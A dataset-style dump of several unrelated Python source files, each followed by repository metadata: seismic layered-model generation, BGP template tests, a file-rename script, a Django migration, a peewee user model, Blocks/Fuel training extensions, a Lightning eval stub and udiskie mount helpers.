sum_numerator = 0.0
for i in range(1, len(t)):
sum_numerator += (t[i] - t[i - 1]) * rdepth_vel_pairs[i][1] * \
rdepth_vel_pairs[i][1]
vrms.append((sum_numerator / t[i]) ** 0.5)
# Interpolate vrms to uniform time grid
tgrid = np.asarray(range(0, NT)) * dt
vrms = np.interp(tgrid, t, vrms)
vrms = np.reshape(vrms, [-1])
# Adjust for time delay
t0 = int(tdelay / dt)
vrms[t0:] = vrms[:-t0]
vrms[:t0] = vrms[t0]
# Return vrms
return vrms
def generate_random_1Dlayered(pars, seed=None):
if seed is not None:
np.random.seed(seed)
if pars.num_layers == 0:
nmin = pars.layer_dh_min
nmax = int(pars.NZ / pars.layer_num_min)
n_layers = np.random.choice(range(pars.layer_num_min, int(pars.NZ/nmin)))
else:
nmin = pars.layer_dh_min
nmax = int(pars.NZ / pars.layer_num_min)
n_layers = int(np.clip(pars.num_layers, nmin, nmax))
NZ = pars.NZ
NX = pars.NX
dh = pars.dh
top_min = int(pars.source_depth / dh + 2 * pars.layer_dh_min)
layers = (nmin + np.random.rand(n_layers) * (nmax - nmin)).astype(np.int)
tops = np.cumsum(layers)
ntos = np.sum(layers[tops <= top_min])
if ntos > 0:
layers = np.concatenate([[ntos], layers[tops > top_min]])
vels = (pars.vp_min
+ np.random.rand() * (pars.vp_max - pars.vp_min - pars.dvmax)
+ np.random.rand(len(layers)) * pars.dvmax)
ramp = np.abs(np.max(vels) - pars.vp_max) * np.random.rand() + 0.1
vels = vels + np.linspace(0, ramp, vels.shape[0])
vels[vels > pars.vp_max] = pars.vp_max
vels[vels < pars.vp_min] = pars.vp_min
if pars.marine:
vels[0] = pars.velwater + (np.random.rand() - 0.5) * 2 * pars.d_velwater
layers[0] = int(pars.water_depth / pars.dh + (
np.random.rand() - 0.5) * 2 * pars.dwater_depth / pars.dh)
vel1d = np.concatenate([np.ones(layers[n]) * vels[n]
for n in range(len(layers))])
if len(vel1d) < NZ:
vel1d = np.concatenate([vel1d, np.ones(NZ - len(vel1d)) * vel1d[-1]])
elif len(vel1d) > NZ:
vel1d = vel1d[:NZ]
if pars.rho_var:
rhos = (pars.rho_min
+ np.random.rand() * (
pars.rho_max - pars.rho_min - pars.drhomax)
+ np.random.rand(len(layers)) * pars.drhomax)
ramp = np.abs(np.max(rhos) - pars.rho_max) * np.random.rand() + 0.1
rhos = rhos + np.linspace(0, ramp, rhos.shape[0])
rhos[rhos > pars.rho_max] = pars.rho_max
rhos[rhos < pars.rho_min] = pars.rho_min
rho1d = np.concatenate([np.ones(layers[n]) * rhos[n]
for n in range(len(layers))])
if len(rho1d) < NZ:
rho1d = np.concatenate(
[rho1d, np.ones(NZ - len(rho1d)) * rho1d[-1]])
elif len(rho1d) > NZ:
rho1d = rho1d[:NZ]
else:
rho1d = vel1d * 0 + pars.rho_default
vp = np.transpose(np.tile(vel1d, [NX, 1]))
vs = vp * 0
rho = np.transpose(np.tile(rho1d, [NX, 1]))
return vp, vs, rho
def texture_1lay(NZ, NX, lz=2, lx=2):
"""
Created a random model with bandwidth limited noise.
@params:
NZ (int): Number of cells in Z
NX (int): Number of cells in X
lz (int): High frequency cut-off size in z
lx (int): High frequency cut-off size in x
@returns:
"""
noise = np.fft.fft2(np.random.random([NZ, NX]))
noise[0, :] = 0
noise[:, 0] = 0
noise[-1, :] = 0
noise[:, -1] = 0
iz = lz
ix = lx
maskz = gaussian(NZ, iz)
maskz = np.roll(maskz, [int(NZ / 2), 0])
maskx = gaussian(NX, ix)
maskx = np.roll(maskx, [int(NX / 2), 0])
noise = noise * np.reshape(maskz, [-1, 1])
noise *= maskx
noise = np.real(np.fft.ifft2(noise))
noise = noise / np.max(noise)
return noise
def generate_reflections_ttime(vp,
pars,
tol=0.015,
window_width=0.45):
"""
Output the reflection travel time at the minimum offset of a CMP gather
@params:
vp (numpy.ndarray) : A 1D array containing the Vp profile in depth
pars (ModelParameter): Parameters used to generate the model
tol (float): The minimum relative velocity change to consider a reflection
window_width (float): time window width in percentage of pars.peak_freq
@returns:
tabel (numpy.ndarray) : A 2D array with pars.NT elements with 1 at reflecion
times +- window_width/pars.peak_freq, 0 elsewhere
"""
vp = vp[int(pars.source_depth / pars.dh):]
vlast = vp[0]
ind = []
for ii, v in enumerate(vp):
if np.abs((v - vlast) / vlast) > tol:
ind.append(ii - 1)
vlast = v
if pars.minoffset != 0:
dt = 2.0 * pars.dh / vp
t0 = np.cumsum(dt)
vrms = np.sqrt(t0 * np.cumsum(vp ** 2 * dt))
tref = np.sqrt(
t0[ind] ** 2 + pars.minoffset ** 2 / vrms[ind] ** 2) + pars.tdelay
else:
ttime = 2 * np.cumsum(pars.dh / vp) + pars.tdelay
tref = ttime[ind]
if pars.identify_direct:
dt = 0
if pars.minoffset != 0:
dt = pars.minoffset / vp[0]
tref = np.insert(tref, 0, pars.tdelay + dt)
tlabel = np.zeros(pars.NT)
for t in tref:
imin = int(t / pars.dt - window_width / pars.peak_freq / pars.dt)
imax = int(t / pars.dt + window_width / pars.peak_freq / pars.dt)
if imin <= pars.NT and imax <= pars.NT:
tlabel[imin:imax] = 1
return tlabel
def two_way_travel_time(vp, pars):
"""
Output the two-way travel-time for each cell in vp
@params:
vp (numpy.ndarray) : A 1D array containing the Vp profile in depth
pars (ModelParameter): Parameters used to generate the model
@returns:
vp (numpy.ndarray) : A 1D array containing the Vp profile in depth, cut to
have the same size of t
t (numpy.ndarray) : The two-way travel time of each cell
"""
vpt = vp[int(pars.source_depth / pars.dh):]
t = 2 * np.cumsum(pars.dh / vpt) + pars.tdelay
t = t[t < pars.NT * pars.dt]
vpt = vpt[:len(t)]
return vpt, t
def interval_velocity_time(vp, pars):
"""
Output the interval velocity in time
@params:
vp (numpy.ndarray) : A 1D array containing the Vp profile in depth
pars (ModelParameter): Parameters used to generate the model
@returns:
vint (numpy.ndarray) : The interval velocity in time
"""
vpt, t = two_way_travel_time(vp, pars)
interpolator = interp1d(t, vpt,
bounds_error=False,
fill_value="extrapolate",
kind="nearest")
vint = interpolator(np.arange(0, pars.NT, 1) * pars.dt)
return vint
def generate_random_2Dlayered(pars, seed=None):
"""
This method generates a random 2D model, with parameters given in pars.
Important parameters are:
Model size:
-pars.NX : Number of grid cells in X
-pars.NZ : Number of grid cells in Z
-pars.dh : Cell size in meters
Number of layers:
-pars.num_layers : Minimum number of layers contained in the model
-pars.layer_dh_min : Minimum thickness of a layer (in grid cell)
-pars.source_depth: Depth in meters of the source. Velocity above the
source is kept constant.
Layers dip
-pars.angle_max: Maximum dip of a layer in degrees
-pars.dangle_max: Maximum dip difference between adjacent layers
Model velocity
-pars.vp_max: Maximum Vp velocity
-pars.vp_min: Minimum Vp velocity
-pars.dvmax: Maximum velocity difference of two adajcent layers
Marine survey parameters
-pars.marine: If True, first layer is water
-pars.velwater: water velocity
-pars.d_velwater: variance of water velocity
-pars.water_depth: Mean water depth
-pars.dwater_depth: variance of water depth
Non planar layers
pars.max_osci_freq: Maximum spatial frequency (1/m) of a layer interface
pars.min_osci_freq: Minimum spatial frequency (1/m) of a layer interface
pars.amp_max: Minimum amplitude of the ondulation of the layer interface
pars.max_osci_nfreq: Maximum number of frequencies of the interface
Add texture in layers
pars.texture_zrange
pars.texture_xrange
pars.max_texture
@params:
pars (str) : A ModelParameters class containing parameters
for model creation.
seed (str) : The seed for the random number generator
@returns:
vp, vs, rho, vels, layers, angles
vp (numpy.ndarray) : An array containing the vp model
vs (numpy.ndarray) : An array containing the vs model (0 for the moment)
rho (numpy.ndarray) : An array containing the density model
(2000 for the moment)
vels (numpy.ndarray) : 1D array containing the mean velocity of each layer
layers (numpy.ndarray) : 1D array containing the mean thickness of each layer,
at the center of the model
angles (numpy.ndarray) : 1D array containing slope of each layer
"""
if seed is not None:
np.random.seed(seed)
# Determine the minimum and maximum number of layers
if pars.num_layers == 0:
nmin = pars.layer_dh_min
nmax = int(pars.NZ / pars.layer_num_min)
if nmin < nmax:
n_layers = np.random.choice(range(nmin, nmax))
else:
n_layers = nmin
else:
nmin = pars.layer_dh_min
nmax = int(pars.NZ / pars.layer_num_min)
n_layers = int(np.clip(pars.num_layers, nmin, nmax))
# Generate a random number of layers with random thicknesses
NZ = pars.NZ
NX = pars.NX
dh = pars.dh
top_min = int(pars.source_depth / dh + 2 * pars.layer_dh_min)
layers = (nmin + np.random.rand(n_layers) * (nmax - nmin)).astype(np.int)
tops = np.cumsum(layers)
ntos = np.sum(layers[tops <= top_min])
if ntos > 0:
layers = np.concatenate([[ntos], layers[tops > top_min]])
# Generate random angles for each layer
n_angles = len(layers)
angles = np.zeros(layers.shape)
angles[1] = -pars.angle_max + np.random.rand() * 2 * pars.angle_max
for ii in range(2, n_angles):
angles[ii] = angles[ii - 1] + (
2.0 * np.random.rand() - 1.0) * pars.dangle_max
if np.abs(angles[ii]) > pars.angle_max:
angles[ii] = np.sign(angles[ii]) * pars.angle_max
# Generate a random velocity for each layer. Velocities are somewhat biased
# to increase in depth
vels = (pars.vp_min
+ np.random.rand() * (pars.vp_max - pars.vp_min - pars.dvmax)
+ np.random.rand(len(layers)) * pars.dvmax)
ramp = np.abs(np.max(vels) - pars.vp_max) * np.random.rand() + 0.1
vels = vels + np.linspace(0, ramp, vels.shape[0])
vels[vels > pars.vp_max] = pars.vp_max
vels[vels < pars.vp_min] = pars.vp_min
if pars.marine:
vels[0] = pars.velwater + (np.random.rand() - 0.5) * 2 * pars.d_velwater
layers[0] = int(pars.water_depth / pars.dh +
(
np.random.rand() - 0.5) * 2 * pars.dwater_depth / pars.dh)
# Generate the 2D model, from top layers to bottom
vel2d = np.zeros([NZ, NX]) + vels[0]
tops = np.cumsum(layers)
osci = create_oscillation(pars.max_osci_freq,
pars.min_osci_freq,
pars.amp_max,
pars.max_osci_nfreq, NX)
texture = texture_1lay(2 * NZ,
NX,
lz=pars.texture_zrange,
lx=pars.texture_xrange)
for ii in range(0, len(layers) - 1):
if np.random.rand() < pars.prob_osci_change:
osci += create_oscillation(pars.max_osci_freq,
pars.min_osci_freq,
pars.amp_max,
pars.max_osci_nfreq, NX)
texture = texture / np.max(texture) * (
np.random.rand() + 0.001) * pars.max_texture * vels[ii + 1]
for jj in range(0, NX):
# depth of the layer at location x
dz = int((np.tan(angles[ii + 1] / 360 * 2 * np.pi) * (
jj - NX / 2) * dh) / dh)
# add oscillation component
if pars.amp_max > 0:
dz = int(dz + osci[jj])
# Check if the interface is inside the model
if 0 < tops[ii] + dz < NZ:
vel2d[tops[ii] + dz:, jj] = vels[ii + 1]
if not (pars.marine and ii == 0) and pars.max_texture > 0:
vel2d[tops[ii] + dz:, jj] += texture[tops[ii]:NZ - dz, jj]
elif tops[ii] + dz <= 0:
vel2d[:, jj] = vels[ii + 1]
if not (pars.marine and ii == 0) and pars.max_texture > 0:
vel2d[:, jj] += texture[:, jj]
# Output the 2D model
vel2d[vel2d > pars.vp_max] = pars.vp_max
vel2d[vel2d < pars.vp_min] = pars.vp_min
vp = vel2d
vs = vp * 0
rho = vp * 0 + 2000
return vp, vs, rho, vels, layers, angles
def create_oscillation(max_osci_freq, min_osci_freq,
amp_max, max_osci_nfreq, Nmax):
nfreqs = np.random.randint(max_osci_nfreq)
freqs = np.random.rand(nfreqs) * (
max_osci_freq - min_osci_freq) + min_osci_freq
phases = np.random.rand(nfreqs) * np.pi * 2
amps = np.random.rand(nfreqs)
x = np.arange(0, Nmax)
osci = np.zeros(Nmax)
for ii in range(nfreqs):
osci += amps[ii] * np.sin(freqs[ii] * x + phases[ii])
dosci = np.max(osci)
if dosci > 0:
osci = osci / dosci * amp_max * np.random.rand()
return osci
if __name__ == "__main__":
import matplotlib.pyplot as plt
# Initialize argument parser
parser = argparse.ArgumentParser()
parser.add_argument(
"--ND",
type=int,
default=1,
help="Dimension of the model to display"
)
# Parse the input for training parameters
args, unparsed = parser.parse_known_args()
pars = ModelParameters()
pars.layer_dh_min = 20
pars.num_layers = 0
if args.ND == 1:
vp, vs, rho = generate_random_1Dlayered(pars)
vp = vp[:, 0]
vint = interval_velocity_time(vp, pars)
vrms = calculate_vrms(vp,
pars.dh,
pars.Npad,
pars.NT,
pars.dt,
pars.tdelay,
pars.source_depth)
plt.plot(vint)
plt.plot(vrms)
plt.show()
else:
vp, vs, rho = generate_random_2Dlayered(pars)
plt.imshow(vp)
plt.show()
| 35.32879 | 90 | 0.574019 | 2,895 | 20,738 | 4.013817 | 0.138515 | 0.019966 | 0.023752 | 0.009639 | 0.356799 | 0.303873 | 0.252065 | 0.223666 | 0.219277 | 0.202754 | 0 | 0.017984 | 0.318931 | 20,738 | 586 | 91 | 35.389079 | 0.80473 | 0.325152 | 0 | 0.254658 | 1 | 0 | 0.004758 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034161 | false | 0 | 0.021739 | 0 | 0.090062 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb6ae706c3937af1f37d14d8ff28c0f63fe2eafa | 1,140 | py | Python | basic-working/tests/templates/eos/test_bgppeer.py | 0xmc/hackathon81_configmodel | 89368e830981ac7bbafde47014b8106f17ab4b0f | [
"Apache-2.0"
] | 2 | 2021-02-04T21:06:56.000Z | 2021-02-06T18:36:46.000Z | basic-working/tests/templates/eos/test_bgppeer.py | 0xmc/hackathon81_configmodel | 89368e830981ac7bbafde47014b8106f17ab4b0f | [
"Apache-2.0"
] | null | null | null | basic-working/tests/templates/eos/test_bgppeer.py | 0xmc/hackathon81_configmodel | 89368e830981ac7bbafde47014b8106f17ab4b0f | [
"Apache-2.0"
] | 3 | 2021-01-31T00:37:35.000Z | 2021-02-06T22:33:39.000Z | """BGP peer EOS template tests."""
import unittest
from configmodel.templates.render import render
class TestBGPPeer(unittest.TestCase):
"""BGP peer unit tests."""
def test_pass_a(self):
"""Local AS only."""
config = {"local_asn": 666}
actual = render("eos", "bgppeer", config)
expected = """router bgp 666
"""
assert actual == expected
def test_pass_b(self):
"""Good ipv4 only."""
config = {"local_asn": "666", "peer_asn": "666", "peer_v4": "192.0.2.1"}
actual = render("eos", "bgppeer", config)
expected = """router bgp 666
neighbor 192.0.2.1 remote-as 666
"""
assert actual == expected
def test_pass_c(self):
"""Good ipv4 and ipv6."""
config = {
"local_asn": "666",
"peer_asn": "666",
"peer_v4": "192.0.2.1",
"peer_v6": "2001:db8:c057:e110::1",
}
actual = render("eos", "bgppeer", config)
expected = """router bgp 666
neighbor 192.0.2.1 remote-as 666
neighbor 2001:db8:c057:e110::1 remote-as 666
"""
assert actual == expected
| 27.142857 | 80 | 0.555263 | 144 | 1,140 | 4.298611 | 0.340278 | 0.048465 | 0.06462 | 0.038772 | 0.681745 | 0.592892 | 0.592892 | 0.441034 | 0.441034 | 0.36349 | 0 | 0.106748 | 0.285088 | 1,140 | 41 | 81 | 27.804878 | 0.652761 | 0.087719 | 0 | 0.482759 | 0 | 0 | 0.308679 | 0.04142 | 0 | 0 | 0 | 0 | 0.103448 | 1 | 0.103448 | false | 0.103448 | 0.068966 | 0 | 0.206897 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
bb6d53b59a393008d2176d1d9d9d50e3035f5670 | 285 | py | Python | Tool_rename_walk/rename.py | yo1995/Daily_Python_Tasks | 211255deead5023cdcea1db4f49a53eedfe762b6 | [
"MIT"
] | 14 | 2018-05-21T05:12:25.000Z | 2021-11-28T14:49:55.000Z | Tool_rename_walk/rename.py | yo1995/Daily_Python_Tasks | 211255deead5023cdcea1db4f49a53eedfe762b6 | [
"MIT"
] | 2 | 2018-11-28T20:59:37.000Z | 2021-07-27T22:39:33.000Z | Tool_rename_walk/rename.py | yo1995/Daily_Python_Tasks | 211255deead5023cdcea1db4f49a53eedfe762b6 | [
"MIT"
] | 6 | 2019-03-21T01:07:57.000Z | 2021-03-29T03:24:33.000Z | import os
path = ''
if not path:
eixt(1)
for root, dirs, files in os.walk(path):
for f in files:
if f == 'readme.md':
src = os.path.join(root, f)
# print(src)
dst = os.path.join(root, 'README.md')
os.rename(src, dst)
| 19 | 49 | 0.494737 | 43 | 285 | 3.27907 | 0.488372 | 0.12766 | 0.141844 | 0.198582 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005495 | 0.361404 | 285 | 14 | 50 | 20.357143 | 0.769231 | 0.035088 | 0 | 0 | 0 | 0 | 0.065934 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb742b121f88b8940766d010d218232cdfe09b69 | 475 | py | Python | accounts/migrations/0025_socialmedia_order.py | Revibe-Music/core-services | 6b11cf16ad2c35d948f3a5c0e7a161e5b7cfc1b2 | [
"MIT"
] | 2 | 2022-01-24T23:30:18.000Z | 2022-01-26T00:21:22.000Z | accounts/migrations/0025_socialmedia_order.py | Revibe-Music/core-services | 6b11cf16ad2c35d948f3a5c0e7a161e5b7cfc1b2 | [
"MIT"
] | null | null | null | accounts/migrations/0025_socialmedia_order.py | Revibe-Music/core-services | 6b11cf16ad2c35d948f3a5c0e7a161e5b7cfc1b2 | [
"MIT"
] | null | null | null | # Generated by Django 3.0 on 2020-04-02 13:22
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0024_auto_20200330_1441'),
]
operations = [
migrations.AddField(
model_name='socialmedia',
name='order',
field=models.IntegerField(blank=True, help_text='The order to display the links in, if any', null=True, verbose_name='order'),
),
]
| 25 | 138 | 0.629474 | 56 | 475 | 5.232143 | 0.803571 | 0.061433 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.084986 | 0.256842 | 475 | 18 | 139 | 26.388889 | 0.745042 | 0.090526 | 0 | 0 | 1 | 0 | 0.216279 | 0.053488 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb78ef4e70b41375cac6c0abf150fde94d9108b2 | 2,074 | py | Python | application/database/domain/user.py | shivankurkapoor/moleculardating | 4a72c3e92a09ab321e0d92840cc7619857bbab8a | [
"BSD-3-Clause"
] | 1 | 2018-04-24T04:38:33.000Z | 2018-04-24T04:38:33.000Z | application/database/domain/user.py | shivankurkapoor/molecular-dating | 4a72c3e92a09ab321e0d92840cc7619857bbab8a | [
"BSD-3-Clause"
] | null | null | null | application/database/domain/user.py | shivankurkapoor/molecular-dating | 4a72c3e92a09ab321e0d92840cc7619857bbab8a | [
"BSD-3-Clause"
] | null | null | null | from peewee import *
from database import *
class User(Model):
user_id = CharField(primary_key=True)
family_name = TextField(default='')
given_name = TextField(default='')
email = TextField(default='')
gender = CharField(default='')
link = TextField(default='')
locale = TextField(default='')
name = TextField(default='')
picture = TextField(default='')
verified_email = BooleanField(default=False)
credentials = TextField(default='')
class Meta:
database = db
def save_user_info(self, user_info):
if 'family_name' in user_info and user_info['family_name'] != None:
self.family_name = user_info['family_name']
if 'given_name' in user_info and user_info['given_name'] != None:
self.given_name = user_info['given_name']
if 'email' in user_info and user_info['email'] != None:
self.email = user_info['email']
if 'gender' in user_info and user_info['gender'] != None:
self.gender = user_info['gender']
if 'link' in user_info and user_info['link'] != None:
self.link = user_info['link']
if 'locale' in user_info and user_info['locale'] != None:
self.locale = user_info['locale']
if 'name' in user_info and user_info['name'] != None:
self.name = user_info['name']
if 'picture' in user_info and user_info['picture'] != None:
self.picture = user_info['picture']
if 'verified_email' in user_info and user_info['verified_email'] != None:
self.verified_email = user_info['verified_email']
if 'credentials' in user_info and user_info['credentials'] != None:
self.credentials = user_info['credentials']
self.save()
def update_credentials(self, credentials):
self.credentials = credentials
self.save()
user_attr = ['user_id', 'family_name', 'given_name', 'email',
'gender', 'link', 'locale', 'name', 'picture',
'verified_email', 'credentials']
| 32.920635 | 81 | 0.616201 | 251 | 2,074 | 4.868526 | 0.151394 | 0.209493 | 0.081833 | 0.106383 | 0.189853 | 0.189853 | 0.103928 | 0 | 0 | 0 | 0 | 0 | 0.253616 | 2,074 | 62 | 82 | 33.451613 | 0.789406 | 0 | 0 | 0.045455 | 0 | 0 | 0.153809 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.045455 | 0 | 0.409091 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb7ae54f93ac463d60bdcacb8b18eb7161938c33 | 3,892 | py | Python | blocks_fuel_classes.py | heikeadel/attention_methods | 2208eec0ec60173585850b69dbfe3aa7a7c270bd | [
"MIT"
] | 1 | 2021-02-01T03:13:11.000Z | 2021-02-01T03:13:11.000Z | blocks_fuel_classes.py | heikeadel/attention_methods | 2208eec0ec60173585850b69dbfe3aa7a7c270bd | [
"MIT"
] | null | null | null | blocks_fuel_classes.py | heikeadel/attention_methods | 2208eec0ec60173585850b69dbfe3aa7a7c270bd | [
"MIT"
] | null | null | null | #!/usr/bin/python
#####
# Description: Blocks Extensions and Fuel classes
# Author: Heike Adel
# Date: 2016
#####
from blocks.extensions import SimpleExtension
import time
import theano
import numpy
from fuel.schemes import BatchScheme
from picklable_itertools import imap
from picklable_itertools.extras import partition_all
################# FUEL #############################################
class ShuffledExampleSchemeBatch(BatchScheme):
def __init__(self, examples, batch_size, seed = 987654):
super(ShuffledExampleSchemeBatch, self).__init__(examples, batch_size)
self.batch_size = batch_size
numpy.random.seed(seed)
def get_request_iterator(self):
indices = list(self.indices)
# shuffle indices
indicesShuffled = []
permutation = numpy.random.permutation(len(indices))
return imap(list, partition_all(self.batch_size, permutation))
################# BLOCKS ###########################################
def getF1(tp, numHypo, numRef):
precision = 1
recall = 0
f1 = 0
if numHypo > 0:
precision = 1.0 * tp / numHypo
if numRef > 0:
recall = 1.0 * tp / numRef
if precision + recall > 0:
f1 = 2 * precision * recall / (precision + recall)
print str(time.ctime()) + "\tP = " + str(precision) + ", R = " + str(recall) + ", F1 = " + str(f1)
return f1
class PrintStatus(SimpleExtension):
def __init__(self, **kwargs):
super(PrintStatus, self).__init__(**kwargs)
def do(self, which_callback, *args):
print self.main_loop.log.status['iterations_done']
class ModelResults(SimpleExtension):
def __init__(self, layer3, y, model, data_stream, num_samples, batch_size, **kwargs):
super(ModelResults, self).__init__(**kwargs)
y_hat = layer3.results()
self.theinputs = [inp for inp in model.inputs if inp.name != 'y'] # name of input variables in graph
self.predict = theano.function(self.theinputs, y_hat)
self.data_stream = data_stream
self.num_samples = num_samples
self.batch_size = batch_size
def do(self, which_callback, *args):
num_batches = self.num_samples / self.batch_size
epoch_iter = self.data_stream.get_epoch_iterator(as_dict=True)
print "ref\thypo\tconfidence for 1"
for i in range(num_batches):
src2vals = epoch_iter.next()
inp = [src2vals[src.name] for src in self.theinputs]
probs = self.predict(*inp)
y_curr = src2vals['y']
for j in range(self.batch_size):
hypo = probs[0][j]
ref = y_curr[j][0]
conf = probs[2][j][1]
print str(ref) + "\t" + str(hypo) + "\t" + str(conf)
class F1Extension(SimpleExtension):
def __init__(self, layer3, y, model, data_stream, num_samples, batch_size, **kwargs):
super(F1Extension, self).__init__(**kwargs)
y_hat = layer3.results()
self.theinputs = [inp for inp in model.inputs if inp.name != 'y'] # name of input variables in graph
self.predict = theano.function(self.theinputs, y_hat)
self.data_stream = data_stream
self.num_samples = num_samples
self.batch_size = batch_size
def do(self, which_callback, *args):
num_batches = self.num_samples / self.batch_size
epoch_iter = self.data_stream.get_epoch_iterator(as_dict=True)
tp = 0
numHypo = 0
numRef = 0
total = 0
tp_tn = 0
for i in range(num_batches):
src2vals = epoch_iter.next()
inp = [src2vals[src.name] for src in self.theinputs]
probs = self.predict(*inp)
y_curr = src2vals['y']
for j in range(self.batch_size):
index = i * self.batch_size + j
hypo = probs[0][j]
ref = y_curr[j][0]
if hypo == 1:
numHypo += 1
if hypo == ref:
tp += 1
if ref == 1:
numRef += 1
if hypo == ref:
tp_tn += 1
total += 1
print "accurracy: ", 100.0 * tp_tn / total
getF1(tp, numHypo, numRef)
| 33.264957 | 104 | 0.635149 | 515 | 3,892 | 4.605825 | 0.242718 | 0.060708 | 0.049325 | 0.03204 | 0.505902 | 0.486509 | 0.475548 | 0.475548 | 0.475548 | 0.457841 | 0 | 0.020765 | 0.220452 | 3,892 | 116 | 105 | 33.551724 | 0.761042 | 0.048818 | 0 | 0.425532 | 0 | 0 | 0.022459 | 0.005896 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.074468 | null | null | 0.053191 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb868374d85808f3925d8d87cb20b424d260cc59 | 1,133 | py | Python | src/eval.py | kredde/pytorch-lightning-hydra-mlflow | 13c56a08aa7718b8117ccbc258cba5378e4650ec | [
"MIT"
] | 13 | 2021-08-29T05:15:40.000Z | 2022-03-19T02:40:36.000Z | src/eval.py | kredde/pytorch-lightning-hydra-mlflow | 13c56a08aa7718b8117ccbc258cba5378e4650ec | [
"MIT"
] | null | null | null | src/eval.py | kredde/pytorch-lightning-hydra-mlflow | 13c56a08aa7718b8117ccbc258cba5378e4650ec | [
"MIT"
] | 1 | 2021-11-23T20:22:00.000Z | 2021-11-23T20:22:00.000Z | import logging
from typing import Optional
from pytorch_lightning import LightningModule, LightningDataModule, Trainer
from pytorch_lightning import seed_everything
from omegaconf import DictConfig
from src.utils import config_utils
log = logging.getLogger(__name__)
def eval(config: DictConfig, model: LightningModule, trainer: Trainer, datamodule: LightningDataModule) -> Optional[float]:
"""Contains the evaluation pipeline.
Uses the configuration to execute the evaluation pipeline on a given model.
args:
config (DictConfig): Configuration composed by Hydra.
model (LightningModule): The model that is evaluated
trainer (Trainer)
datamodule (LightningDataModule)
"""
if 'seed' in config:
seed_everything(config.seed)
# Send some parameters from config to all lightning loggers
log.info('Logging hyperparameters!')
config_utils.log_hyperparameters(
config=config,
model=model,
datamodule=datamodule,
trainer=trainer,
callbacks=[],
logger=trainer.logger,
)
# add your evaluation logic here
| 26.97619 | 123 | 0.720212 | 121 | 1,133 | 6.652893 | 0.479339 | 0.052174 | 0.049689 | 0.064596 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.215357 | 1,133 | 41 | 124 | 27.634146 | 0.905512 | 0.336275 | 0 | 0 | 0 | 0 | 0.039106 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.315789 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
bb8e1dcb77ddeb651696cb9409995f302bf0ba3f | 24,733 | py | Python | udiskie/mount.py | LocutusOfBorg/udiskie | 8aa85bb99d44fedc19ec584389072c264877e767 | [
"MIT"
] | null | null | null | udiskie/mount.py | LocutusOfBorg/udiskie | 8aa85bb99d44fedc19ec584389072c264877e767 | [
"MIT"
] | null | null | null | udiskie/mount.py | LocutusOfBorg/udiskie | 8aa85bb99d44fedc19ec584389072c264877e767 | [
"MIT"
] | null | null | null | """
Mount utilities.
"""
from __future__ import absolute_import
from __future__ import unicode_literals
from collections import namedtuple
from functools import partial
import logging
from .async_ import AsyncList, Coroutine, Return
from .common import wraps, setdefault, exc_message
from .compat import basestring
from .config import IgnoreDevice, FilterMatcher
from .locale import _
__all__ = ['Mounter']
# TODO: add / remove / XXX_all should make proper use of the asynchronous
# execution.
@Coroutine.from_generator_function
def _False():
yield Return(False)
def _find_device(fn, set_error=False):
"""
Decorator for Mounter methods taking a Device as their first argument.
Enables to pass the path name as first argument and does some common error
handling (logging).
"""
@wraps(fn)
def wrapper(self, device_or_path, *args, **kwargs):
try:
device = self.udisks.find(device_or_path)
except ValueError as e:
self._log.error(exc_message(e))
return _False()
return Coroutine(fn(self, device, *args, **kwargs))
return wrapper
def _sets_async_error(fn):
@wraps(fn)
def wrapper(self, device, *args, **kwargs):
async_ = fn(self, device, *args, **kwargs)
